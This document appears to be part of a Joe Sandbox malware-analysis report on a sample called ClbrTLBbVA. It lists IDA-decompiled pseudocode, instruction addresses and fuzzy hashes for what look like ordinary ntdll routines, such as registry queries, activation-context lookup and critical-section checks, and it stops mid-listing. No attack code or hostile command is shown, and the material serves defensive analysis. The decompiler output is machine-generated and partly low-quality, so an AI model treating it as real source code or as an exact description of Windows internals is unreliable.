								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E016EF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E016E95D0();
										L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                        0x016df0d3
                                        0x016df0d9
                                        0x016df0e0
                                        0x016df0e7
                                        0x016df0f2
                                        0x016df0f4
                                        0x016df0f8
                                        0x016df100
                                        0x016df108
                                        0x016df10d
                                        0x016df115
                                        0x016df116
                                        0x016df11f
                                        0x016df123
                                        0x016df124
                                        0x016df12c
                                        0x016df130
                                        0x016df134
                                        0x016df13d
                                        0x016df144
                                        0x016df14b
                                        0x016df152
                                        0x0171bab0
                                        0x0171bab0
                                        0x016df158
                                        0x016df158
                                        0x016df15a
                                        0x016df160
                                        0x016df165
                                        0x016df166
                                        0x016df16f
                                        0x016df173
                                        0x0171baa7
                                        0x0171baa7
                                        0x0171baab
                                        0x00000000
                                        0x016df179
                                        0x016df18d
                                        0x016df191
                                        0x0171baa2
                                        0x00000000
                                        0x016df197
                                        0x016df19b
                                        0x016df1a2
                                        0x016df1a9
                                        0x016df1af
                                        0x016df1b2
                                        0x016df1b6
                                        0x016df1b9
                                        0x016df1c4
                                        0x016df1d8
                                        0x016df1df
                                        0x016df1e3
                                        0x016df1eb
                                        0x016df1ee
                                        0x016df1f4
                                        0x016df20f
                                        0x0171bab7
                                        0x0171babb
                                        0x0171bacc
                                        0x0171bad1
                                        0x016df215
                                        0x016df218
                                        0x016df226
                                        0x016df22b
                                        0x00000000
                                        0x016df22b
                                        0x016df1f6
                                        0x016df1f6
                                        0x016df1f9
                                        0x016df1fb
                                        0x016df1fb
                                        0x016df1f4
                                        0x016df191
                                        0x016df173
                                        0x016df152
                                        0x016df203

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @
                                        • API String ID: 0-2766056989
                                        • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                        • Instruction ID: 87883e133c5b97bb54c4a1d32614f9cb998b8a005811fa5ce0e74819060a0f5a
                                        • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                        • Instruction Fuzzy Hash: 7B517C725057119FC320DF29C840A6BBBF9FF48B10F008A2DFA9687690E7B4E905CB95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01723540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 75%
                                        			E01723540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x179d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E016E0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01723706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E016EFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01723540;
						E016EFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E016FDDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01730C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E016E97C0();
					}
					return E016EB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01723971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01723884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E016EFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E016E9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01723787(_a4,  &_v352, _t80);
						}
					}
					L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E016E95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                        0x01723552
                                        0x0172355a
                                        0x0172355d
                                        0x01723566
                                        0x01723567
                                        0x0172357e
                                        0x0172358f
                                        0x017235a1
                                        0x017235a5
                                        0x0172366b
                                        0x0172366b
                                        0x0172366d
                                        0x01723672
                                        0x01723679
                                        0x01723685
                                        0x0172368d
                                        0x0172369d
                                        0x017236a7
                                        0x017236b8
                                        0x017236c6
                                        0x017236c7
                                        0x017236dc
                                        0x017236e1
                                        0x017236e7
                                        0x017236e9
                                        0x017236e9
                                        0x01723703
                                        0x01723703
                                        0x017235b5
                                        0x017235c0
                                        0x017235c4
                                        0x00000000
                                        0x00000000
                                        0x017235ca
                                        0x017235d7
                                        0x017235e2
                                        0x017235e6
                                        0x017235e8
                                        0x017235f5
                                        0x017235fa
                                        0x01723603
                                        0x01723604
                                        0x01723609
                                        0x0172360a
                                        0x01723612
                                        0x01723613
                                        0x0172361e
                                        0x01723622
                                        0x01723628
                                        0x0172362f
                                        0x0172362f
                                        0x01723636
                                        0x01723638
                                        0x0172363b
                                        0x01723642
                                        0x01723642
                                        0x01723636
                                        0x01723657
                                        0x01723657
                                        0x0172365c
                                        0x01723662
                                        0x01723669
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: BinaryHash
                                        • API String ID: 0-2202222882
                                        • Opcode ID: 29d9909412df74c6626518b9dff77f35d8268c87532c6493d906713540e0f979
                                        • Instruction ID: fb90456dc5dec4fcc4a249ee7cff1059a302eab58a8f59d37c48cf868dd53aa6
                                        • Opcode Fuzzy Hash: 29d9909412df74c6626518b9dff77f35d8268c87532c6493d906713540e0f979
                                        • Instruction Fuzzy Hash: 844133B1D0152D9BDF219A54CC84FEEB77DAB44714F0045A9EA09AB240DB349E898FA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01723884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 72%
                                        			E01723884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E016E9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L016C4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E016E9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                        0x01723893
                                        0x01723896
                                        0x01723899
                                        0x0172389f
                                        0x017238a0
                                        0x017238a4
                                        0x017238a9
                                        0x017238ac
                                        0x017238ad
                                        0x017238ae
                                        0x017238af
                                        0x017238b1
                                        0x017238b4
                                        0x017238bb
                                        0x017238bc
                                        0x017238bd
                                        0x017238c4
                                        0x017238c8
                                        0x017238ca
                                        0x017238ca
                                        0x017238d5
                                        0x0172393e
                                        0x01723940
                                        0x01723942
                                        0x01723952
                                        0x01723954
                                        0x01723961
                                        0x01723961
                                        0x01723967
                                        0x0172396e
                                        0x0172396e
                                        0x01723947
                                        0x0172394c
                                        0x00000000
                                        0x0172394c
                                        0x017238ea
                                        0x017238ee
                                        0x017238f8
                                        0x017238f9
                                        0x017238ff
                                        0x01723900
                                        0x01723902
                                        0x01723903
                                        0x0172390b
                                        0x0172390f
                                        0x01723950
                                        0x00000000
                                        0x01723950
                                        0x01723915
                                        0x0172391d
                                        0x0172391d
                                        0x01723922
                                        0x01723926
                                        0x00000000
                                        0x01723928
                                        0x0172392b
                                        0x0172392b
                                        0x01723935
                                        0x01723937
                                        0x01723937
                                        0x00000000
                                        0x01723935
                                        0x01723926
                                        0x017238f0
                                        0x00000000

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: BinaryName
                                        • API String ID: 0-215506332
                                        • Opcode ID: 9b3a4bf5a4c9494d2ece879f2234b4d02dd7476941e1bfc0aecd3c4079049744
                                        • Instruction ID: 4e17ad1ddb9476449af668c1a3b1954f7dfeb2794bbec839edab9bf78d149bc6
                                        • Opcode Fuzzy Hash: 9b3a4bf5a4c9494d2ece879f2234b4d02dd7476941e1bfc0aecd3c4079049744
                                        • Instruction Fuzzy Hash: 31313532A0052AAFEB15DA5CC845E7BFBB4FF49B24F01416DE984A7240D7349E01CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016DD294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 33%
                                        			E016DD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x179d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E016C4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E016EB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E016E98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E016E95D0();
					L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                        0x016dd29c
                                        0x016dd2a6
                                        0x016dd2b1
                                        0x016dd2b5
                                        0x016dd2b6
                                        0x016dd2bc
                                        0x016dd2bd
                                        0x016dd2be
                                        0x016dd2bf
                                        0x016dd2c2
                                        0x016dd2c4
                                        0x016dd2cc
                                        0x016dd384
                                        0x016dd34b
                                        0x016dd34f
                                        0x016dd350
                                        0x016dd351
                                        0x016dd35c
                                        0x016dd35c
                                        0x016dd2d6
                                        0x016dd2da
                                        0x016dd2e1
                                        0x016dd361
                                        0x016dd369
                                        0x016dd36d
                                        0x016dd2e3
                                        0x016dd2e3
                                        0x016dd2e3
                                        0x016dd2e5
                                        0x016dd2ed
                                        0x016dd2f5
                                        0x016dd2fa
                                        0x016dd302
                                        0x016dd303
                                        0x016dd30b
                                        0x016dd30f
                                        0x016dd313
                                        0x016dd318
                                        0x016dd31c
                                        0x016dd320
                                        0x016dd379
                                        0x016dd37d
                                        0x00000000
                                        0x00000000
                                        0x0171affe
                                        0x0171b001
                                        0x0171b011
                                        0x00000000
                                        0x016dd322
                                        0x016dd322
                                        0x016dd330
                                        0x016dd337
                                        0x016dd35d
                                        0x016dd339
                                        0x016dd33f
                                        0x016dd38c
                                        0x016dd38c
                                        0x016dd33f
                                        0x016dd349
                                        0x00000000
                                        0x016dd349

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @
                                        • API String ID: 0-2766056989
                                        • Opcode ID: 097fbd879dbb52345520bbc33587ea5d4b6ed2e15942756a0ef02a882253e8fa
                                        • Instruction ID: 4d8b4b89eda5e1c561121a3586cb839f0078022ba01b3cb8e25cd07ef1a54d2f
                                        • Opcode Fuzzy Hash: 097fbd879dbb52345520bbc33587ea5d4b6ed2e15942756a0ef02a882253e8fa
                                        • Instruction Fuzzy Hash: D631A4B19093059FC321EF68CD8496BBBE8EB8A654F01092EF59483250DB35DD05CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016B1B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 72%
                                        			E016B1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E016EBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E016EA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E016EA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L016C4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                        0x016b1b8f
                                        0x016b1b9a
                                        0x016b1b9c
                                        0x016b1b9e
                                        0x016b1ba3
                                        0x01707010
                                        0x01707010
                                        0x00000000
                                        0x016b1ba9
                                        0x016b1ba9
                                        0x016b1bae
                                        0x00000000
                                        0x016b1bc5
                                        0x016b1bca
                                        0x016b1bcf
                                        0x016b1bd0
                                        0x016b1bd1
                                        0x016b1bd2
                                        0x016b1bd6
                                        0x016b1bdc
                                        0x016b1be0
                                        0x01706ffc
                                        0x01707000
                                        0x00000000
                                        0x01707006
                                        0x01707009
                                        0x01707009
                                        0x016b1be6
                                        0x016b1bec
                                        0x016b1c0b
                                        0x016b1c0b
                                        0x016b1c0c
                                        0x016b1c11
                                        0x016b1c12
                                        0x016b1c15
                                        0x016b1c1b
                                        0x016b1c1f
                                        0x016b1c31
                                        0x016b1c33
                                        0x01707026
                                        0x01707026
                                        0x016b1c21
                                        0x016b1c24
                                        0x016b1c24
                                        0x016b1bee
                                        0x016b1bee
                                        0x016b1bf2
                                        0x016b1c3a
                                        0x016b1bf4
                                        0x016b1bf4
                                        0x016b1c05
                                        0x016b1c05
                                        0x016b1c09
                                        0x016b1c3e
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x016b1c09
                                        0x016b1bec
                                        0x016b1be0
                                        0x016b1bae
                                        0x016b1c2e

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: WindowsExcludedProcs
                                        • API String ID: 0-3583428290
                                        • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                        • Instruction ID: 544679c5cd03ab7ccae74156efbfe9e3ed303d48464c5463df6461edc49c1021
                                        • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                        • Instruction Fuzzy Hash: 3E21F87A501229FBDB32DA599C94FABBBADEF42A50F054525FA048B300D734DC4197E0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016CF716 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E016CF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                        0x016cf71d
                                        0x016cf722
                                        0x016cf726
                                        0x01714770
                                        0x016cf765
                                        0x016cf769
                                        0x016cf769
                                        0x016cf732
                                        0x0171477a
                                        0x00000000
                                        0x0171477a
                                        0x016cf738
                                        0x016cf73a
                                        0x016cf73c
                                        0x016cf73f
                                        0x016cf746
                                        0x016cf778
                                        0x016cf7a9
                                        0x016cf7a9
                                        0x016cf754
                                        0x016cf75a
                                        0x016cf75d
                                        0x016cf75f
                                        0x016cf761
                                        0x016cf76f
                                        0x016cf771
                                        0x016cf771
                                        0x016cf76f
                                        0x016cf763
                                        0x00000000
                                        0x016cf763
                                        0x016cf77d
                                        0x016cf7a3
                                        0x016cf7a5
                                        0x00000000
                                        0x016cf7a5
                                        0x016cf77f
                                        0x016cf782
                                        0x016cf784
                                        0x016cf786
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x016cf788
                                        0x016cf748
                                        0x016cf74d
                                        0x016cf78d
                                        0x016cf793
                                        0x016cf7b7
                                        0x016cf7bc
                                        0x00000000
                                        0x016cf7bc
                                        0x016cf798
                                        0x00000000
                                        0x00000000
                                        0x016cf79d
                                        0x016cf7b0
                                        0x00000000
                                        0x016cf7b0
                                        0x016cf79f
                                        0x00000000
                                        0x016cf74f
                                        0x016cf74f
                                        0x00000000
                                        0x016cf74f

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Actx
                                        • API String ID: 0-89312691
                                        • Opcode ID: 9b2dcce0ebf7de870036ccf0a5e6c34b97ea655562f5ea400c6a3c3628440a0e
                                        • Instruction ID: af1bf7aaa24c4f2d2b318d0fa0dc2e09b717e56eb746a1eb4fc313f40c79ff0e
                                        • Opcode Fuzzy Hash: 9b2dcce0ebf7de870036ccf0a5e6c34b97ea655562f5ea400c6a3c3628440a0e
                                        • Instruction Fuzzy Hash: 4411BF393047028BEB294F1DAC9073676D7EB96E24F2445AEE562CB791DB70C8428361
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01758DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 71%
                                        			E01758DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x1780d50);
				E016FD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01735720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L016FDEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L016FDEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E016FD130(_t34, _t39, _t40);
			}





                                        0x01758df1
                                        0x01758df1
                                        0x01758df1
                                        0x01758df1
                                        0x01758df1
                                        0x01758df1
                                        0x01758df3
                                        0x01758df8
                                        0x01758dfd
                                        0x01758e00
                                        0x01758e0e
                                        0x01758e2a
                                        0x01758e36
                                        0x01758e38
                                        0x01758e3c
                                        0x01758e46
                                        0x01758e46
                                        0x01758e36
                                        0x01758e50
                                        0x01758e56
                                        0x01758e59
                                        0x01758e5c
                                        0x01758e60
                                        0x01758e67
                                        0x01758e6d
                                        0x01758e73
                                        0x01758e74
                                        0x01758eb1
                                        0x01758ebd

                                        Strings
                                        • Critical error detected %lx, xrefs: 01758E21
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Critical error detected %lx
                                        • API String ID: 0-802127002
                                        • Opcode ID: 1264dbbfba77f34b07de039a0ec0f5878a06bc6a8292b7edb6ffd0f0c8696e03
                                        • Instruction ID: 63c1aac1871d737779d0a7d18f5c87273d4638d56a49ad21d9ab6f0d41c0a883
                                        • Opcode Fuzzy Hash: 1264dbbfba77f34b07de039a0ec0f5878a06bc6a8292b7edb6ffd0f0c8696e03
                                        • Instruction Fuzzy Hash: 911187B1D00348DBDF25DFB989057ACFBB1BB08310F24426EEA29AB292C3741602DF15
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0173FF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                        Download Yara Rule
                                        Strings
                                        • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0173FF60
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                        • API String ID: 0-1911121157
                                        • Opcode ID: 729ed7dc415d8164cd0b3533fe48849bb33fcc5e712850d268dfffe9015e0b8a
                                        • Instruction ID: f4ca5f3ea2a282f8130bd5008d2887deef1cc88e6b92051179dee66d6a0e0ade
                                        • Opcode Fuzzy Hash: 729ed7dc415d8164cd0b3533fe48849bb33fcc5e712850d268dfffe9015e0b8a
                                        • Instruction Fuzzy Hash: 9C114071910145EFDF22EF94CC48F98BBB2FF48744F108058F6086B2A2C7389944CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01775BA5 Relevance: .6, Instructions: 592COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 88%
